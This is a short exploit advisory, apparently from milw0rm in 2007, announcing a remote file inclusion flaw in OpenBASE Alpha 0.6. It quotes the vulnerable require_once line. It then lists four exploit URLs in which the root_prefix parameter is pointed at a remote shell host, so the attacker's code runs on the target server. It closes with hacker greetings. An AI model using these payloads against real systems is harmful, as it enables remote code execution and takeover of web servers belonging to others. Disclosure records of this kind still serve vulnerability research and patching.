********************************************************************************************************** DeltaSecurityTEAM WwW.DeltaSecurity.iR ********************************************************************************************************** * Portal Name = OpenBASE Alpha 0.6 * Class = Remote File Inclusion * Risk = High (Remote File Execution) * Download = Http://openbase.sourceforge.net * Discoverd By = DeltahackingTEAM * User In Delta Team = Dav00d_Cracker * Conatact = Davood_cracker@Yahoo.com -------------------------------------------------------------------------------------------- Vulnerability C0de : Require_once($root_prefix . "nav.php"); -------------------------------------------------------------------------------------------- - Expl0it: Http://localhost/[PATH]/index.php?root_prefix=http://Shellz? Http://localhost/[PATH]/email_subscribe.php?root_prefix=http://Shellz? Http://localhost/[PATH]/download.php?root_prefix=http://Shellz? Http://localhost/[PATH]/development.php?root_prefix=http://Shellz? -------------------------------------------------------------------------------------------- Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy ********************************************************************************************************** # milw0rm.com [2007-05-25]